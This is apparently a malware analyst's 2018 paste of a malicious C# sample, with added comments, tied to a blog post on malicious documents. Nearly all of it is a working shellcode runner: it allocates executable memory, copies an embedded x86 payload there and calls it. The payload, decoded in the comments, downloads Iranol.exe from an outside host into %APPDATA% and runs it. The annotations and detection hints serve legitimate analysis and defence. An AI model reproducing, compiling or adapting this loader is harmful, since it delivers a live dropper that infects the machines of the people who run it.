dissectmalware

Embedded c# code (mal)

Mar 31st, 2018
  1. NOTE: Malicious C# code. Please be cautious if you want to compile it. Do it in a test environment.
  2.  
  3. Please read my blog regarding this code: https://dissectmalware.wordpress.com/2018/03/31/a-close-look-at-malicious-documents-part-ii/
  4.  
  5. using System;
  6. using   System.Runtime.InteropServices;
  // Analyst annotation (comments only; every code line below is unchanged).
  // This class is an in-memory shellcode runner: constructing an instance copies the
  // embedded byte array into freshly allocated executable memory and calls it.
  // Type, member and variable names are random-looking strings and carry no meaning.
  7. public  class   S1cA13Ui3D
  8. {
  // P/Invoke binding for kernel32!VirtualAlloc (address, size, allocation type, protection).
  9.  [DllImport("kernel32.dll")]
  10.     static  extern  IntPtr VirtualAlloc(IntPtr yJ6g, uint   TCSXjMuZ, uint R2VramTDi8,  uint lO);
  // Delegate type used to invoke the copied bytes as a parameterless function returning int.
  11.  private delegate   int YnGULTEE();
  // Constructor: all of the behaviour runs here, so merely instantiating the type triggers it.
  // Neither string parameter is referenced anywhere in the body.
  12.  public S1cA13Ui3D(string xotXiQLZOu,   string pAknJ0)
  13.     {
  // Embedded native payload, stored as decimal byte values.
  // Readable strings inside the array (useful as indicators and for triage):
  //   - rows numbered 42-52: UTF-16LE text that decodes to hxxp://rsniaga[.]com/project/Iranol.exe
  //     followed by an %APPDATA%\<keyboard-mash name>.exe path;
  //   - rows numbered 88-101: "kernel32.dll" (UTF-16LE) and the ASCII names LoadLibraryA,
  //     GetProcAddress, Urlmon, ExitProcess, URLDownloadToFileW, ExpandEnvironmentStringsW,
  //     Shell32 and ShellExecuteW.
  // Those names are consistent with a download-to-disk-then-execute stage; the native code
  // itself is not disassembled here, so treat that as an inference to confirm in a sandbox.
  // NOTE(review): the bytes look like 32-bit x86 (e.g. 100, 139, 21, 48, 0, 0, 0 resembles a
  // read of fs:[0x30]) and the leading rows look like a decoding stub - unverified.
  14.     byte [] SXM2 = {83, 80, 85, 235, 82, 107, 237, 0, 107, 237, 0, 131, 197, 0, 156,
  15. 87, 95, 81, 86, 82, 129, 198, 17, 91, 0, 0, 129, 238, 194, 99, 0,
  16. 0, 129, 233, 155, 85, 0, 0, 129, 198, 123, 49, 0, 0, 141, 150, 173,
  17. 111, 0, 0, 129, 193, 195, 40, 0, 0, 90, 94, 89, 157, 49, 43, 131,
  18. 195, 4, 235, 2, 235, 52, 57, 195, 114, 191, 141, 136, 107, 252, 255,
  19. 255, 232, 5, 2, 0, 0, 93, 235, 42, 232, 0, 0, 0, 0, 91, 144, 144,
  20. 156, 83, 86, 129, 195, 174, 3, 0, 0, 141, 155, 220, 93, 0, 0, 94,
  21. 91, 157, 129, 195, 85, 1, 0, 0, 235, 202, 141, 131, 149, 3, 0, 0,
  22. 235, 132, 88, 91, 235, 4, 251, 182, 199, 105, 195, 216, 82, 199,
  23. 27, 192, 196, 53, 196, 181, 21, 39, 250, 172, 18, 136, 58, 156, 187,
  24. 234, 85, 188, 135, 194, 181, 205, 158, 165, 150, 81, 30, 146, 69,
  25. 206, 87, 39, 101, 14, 17, 235, 48, 95, 193, 133, 174, 211, 218, 1,
  26. 2, 129, 247, 16, 155, 195, 50, 68, 132, 120, 82, 87, 149, 66, 20,
  27. 102, 192, 196, 106, 48, 70, 237, 185, 91, 0, 42, 28, 172, 152, 171,
  28. 158, 82, 207, 168, 128, 28, 181, 155, 121, 191, 246, 132, 242, 19,
  29. 9, 33, 71, 85, 127, 61, 9, 98, 59, 222, 64, 3, 181, 150, 162, 28,
  30. 54, 181, 223, 253, 33, 145, 213, 147, 37, 197, 221, 181, 142, 111,
  31. 255, 87, 114, 116, 54, 220, 4, 181, 182, 61, 197, 97, 35, 100, 207,
  32. 35, 214, 85, 11, 110, 29, 127, 119, 186, 120, 242, 107, 191, 223,
  33. 162, 202, 190, 248, 165, 80, 181, 99, 123, 206, 175, 239, 65, 101,
  34. 243, 226, 254, 205, 80, 53, 216, 147, 89, 216, 93, 85, 165, 232,
  35. 187, 4, 10, 252, 9, 43, 235, 95, 124, 35, 106, 75, 180, 91, 170,
  36. 53, 239, 154, 23, 254, 80, 49, 159, 67, 35, 80, 246, 144, 18, 53,
  37. 208, 165, 109, 116, 40, 185, 103, 49, 124, 179, 92, 107, 13, 114,
  38. 5, 47, 38, 7, 196, 227, 76, 249, 221, 123, 144, 125, 184, 195, 194,
  39. 196, 32, 156, 187, 46, 134, 55, 149, 144, 65, 92, 236, 115, 197,
  40. 168, 35, 86, 241, 200, 161, 232, 68, 193, 17, 79, 33, 40, 161, 102,
  41. 20, 106, 64, 246, 7, 7, 233, 5, 139, 208, 210, 5, 18, 45, 188, 33,
  42. 54, 91, 41, 118, 245, 165, 159, 85, 236, 179, 232, 131, 160, 104,
  43. 0, 116, 0, 116, 0, 112, 0, 58, 0, 47, 0, 47, 0, 114, 0, 115, 0, 110,
  44. 0, 105, 0, 97, 0, 103, 0, 97, 0, 46, 0, 99, 0, 111, 0, 109, 0, 47,
  45. 0, 112, 0, 114, 0, 111, 0, 106, 0, 101, 0, 99, 0, 116, 0, 47, 0,
  46. 73, 0, 114, 0, 97, 0, 110, 0, 111, 0, 108, 0, 46, 0, 101, 0, 120,
  47. 0, 101, 0, 0, 0, 37, 0, 65, 0, 80, 0, 80, 0, 68, 0, 65, 0, 84, 0,
  48. 65, 0, 37, 0, 92, 0, 106, 0, 100, 0, 104, 0, 103, 0, 100, 0, 106,
  49. 0, 104, 0, 103, 0, 100, 0, 103, 0, 100, 0, 104, 0, 103, 0, 100, 0,
  50. 104, 0, 100, 0, 103, 0, 102, 0, 103, 0, 100, 0, 104, 0, 103, 0, 100,
  51. 0, 102, 0, 100, 0, 104, 0, 103, 0, 100, 0, 104, 0, 103, 0, 46, 0,
  52. 101, 0, 120, 0, 101, 0, 0, 0, 0, 0, 85, 137, 229, 129, 236, 68, 1,
  53. 0, 0, 137, 207, 49, 192, 137, 193, 73, 137, 189, 244, 254, 255, 255,
  54. 242, 102, 175, 137, 189, 248, 254, 255, 255, 141, 149, 188, 254,
  55. 255, 255, 82, 232, 163, 1, 0, 0, 139, 133, 188, 254, 255, 255, 255,
  56. 112, 4, 232, 170, 0, 0, 0, 137, 195, 139, 141, 192, 254, 255, 255,
  57. 255, 113, 4, 80, 232, 196, 0, 0, 0, 137, 199, 139, 141, 196, 254,
  58. 255, 255, 255, 113, 4, 83, 232, 179, 0, 0, 0, 137, 198, 139, 141,
  59. 212, 254, 255, 255, 255, 113, 4, 83, 255, 214, 104, 4, 1, 0, 0, 141,
  60. 149, 252, 254, 255, 255, 82, 255, 181, 248, 254, 255, 255, 255, 208,
  61. 139, 141, 200, 254, 255, 255, 255, 113, 4, 255, 215, 139, 141, 208,
  62. 254, 255, 255, 255, 113, 4, 80, 255, 214, 106, 0, 106, 0, 141, 149,
  63. 252, 254, 255, 255, 82, 255, 181, 244, 254, 255, 255, 106, 0, 255,
  64. 208, 139, 141, 216, 254, 255, 255, 255, 113, 4, 255, 215, 139, 141,
  65. 220, 254, 255, 255, 255, 113, 4, 80, 255, 214, 106, 1, 106, 0, 106,
  66. 0, 141, 149, 252, 254, 255, 255, 82, 106, 0, 106, 0, 255, 208, 139,
  67. 141, 204, 254, 255, 255, 255, 113, 4, 83, 255, 214, 106, 0, 255,
  68. 208, 85, 137, 229, 82, 100, 139, 21, 48, 0, 0, 0, 139, 82, 12, 131,
  69. 194, 12, 139, 18, 139, 74, 48, 255, 117, 8, 81, 232, 121, 0, 0, 0,
  70. 133, 192, 116, 238, 139, 66, 24, 90, 201, 194, 4, 0, 85, 137, 229,
  71. 83, 82, 86, 87, 139, 85, 8, 139, 66, 60, 141, 68, 2, 120, 139, 0,
  72. 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 48, 192, 133, 201,
  73. 116, 60, 81, 139, 11, 141, 12, 17, 137, 207, 87, 139, 117, 12, 49,
  74. 201, 73, 242, 174, 247, 209, 95, 243, 166, 117, 29, 89, 88, 43, 72,
  75. 24, 247, 217, 139, 88, 36, 1, 211, 15, 183, 28, 75, 139, 64, 28,
  76. 141, 4, 152, 139, 4, 16, 1, 208, 235, 12, 131, 195, 4, 89, 73, 235,
  77. 192, 49, 192, 131, 196, 4, 95, 94, 90, 91, 201, 194, 8, 0, 85, 137,
  78. 229, 82, 139, 77, 8, 139, 85, 12, 102, 139, 1, 102, 133, 192, 116,
  79. 57, 102, 59, 2, 116, 41, 102, 131, 248, 97, 114, 6, 102, 131, 248,
  80. 122, 118, 12, 102, 131, 248, 65, 114, 19, 102, 131, 248, 90, 119,
  81. 13, 102, 131, 240, 32, 102, 59, 2, 116, 2, 235, 2, 235, 4, 49, 192,
  82. 235, 14, 131, 193, 2, 131, 194, 2, 102, 139, 1, 235, 194, 131, 200,
  83. 1, 90, 201, 194, 8, 0, 85, 137, 229, 131, 236, 4, 87, 82, 83, 199,
  84. 69, 252, 2, 0, 0, 0, 232, 0, 0, 0, 0, 88, 131, 192, 57, 139, 93,
  85. 8, 185, 1, 0, 0, 0, 133, 201, 116, 22, 137, 199, 137, 3, 131, 195,
  86. 4, 131, 192, 8, 137, 71, 4, 15, 183, 87, 2, 1, 208, 73, 235, 230,
  87. 255, 77, 252, 116, 7, 185, 8, 0, 0, 0, 235, 218, 91, 90, 95, 201,
  88. 194, 4, 0, 24, 0, 26, 0, 0, 0, 0, 0, 107, 0, 101, 0, 114, 0, 110,
  89. 0, 101, 0, 108, 0, 51, 0, 50, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0,
  90. 0, 12, 0, 13, 0, 0, 0, 0, 0, 76, 111, 97, 100, 76, 105, 98, 114,
  91. 97, 114, 121, 65, 0, 14, 0, 15, 0, 0, 0, 0, 0, 71, 101, 116, 80,
  92. 114, 111, 99, 65, 100, 100, 114, 101, 115, 115, 0, 6, 0, 7, 0, 0,
  93. 0, 0, 0, 85, 114, 108, 109, 111, 110, 0, 11, 0, 12, 0, 0, 0, 0, 0,
  94. 69, 120, 105, 116, 80, 114, 111, 99, 101, 115, 115, 0, 18, 0, 19,
  95. 0, 0, 0, 0, 0, 85, 82, 76, 68, 111, 119, 110, 108, 111, 97, 100,
  96. 84, 111, 70, 105, 108, 101, 87, 0, 25, 0, 26, 0, 0, 0, 0, 0, 69,
  97. 120, 112, 97, 110, 100, 69, 110, 118, 105, 114, 111, 110, 109, 101,
  98. 110, 116, 83, 116, 114, 105, 110, 103, 115, 87, 0, 7, 0, 8, 0, 0,
  99. 0, 0, 0, 83, 104, 101, 108, 108, 51, 50, 0, 13, 0, 14, 0, 0, 0, 0,
  100. 0, 83, 104, 101, 108, 108, 69, 120, 101, 99, 117, 116, 101, 87, 0,
  101. 0};;
  // Allocates a region the size of the array with type 0x1000 (MEM_COMMIT) and protection
  // 0x40 (PAGE_EXECUTE_READWRITE). The returned pointer is not checked.
  // Detection: a managed process committing RWX memory and then calling
  // Marshal.GetDelegateForFunctionPointer on it is a strong hunting signal.
  102.  IntPtr Zm =    VirtualAlloc(IntPtr.Zero,   (uint)SXM2.Length,  0x1000, 0x40);
  // Copies the whole managed byte array into the unmanaged region.
  103.  Marshal.Copy(SXM2, 0,  Zm, SXM2.Length);
  // Wraps the region's base address in the delegate type declared above.
  104.  YnGULTEE ZcuPj4 =  (YnGULTEE)Marshal.GetDelegateForFunctionPointer(Zm, typeof(YnGULTEE));
  // Invoking the delegate transfers execution to the first copied byte; the int result is discarded.
  105.  ZcuPj4();
  106.  }
  107. }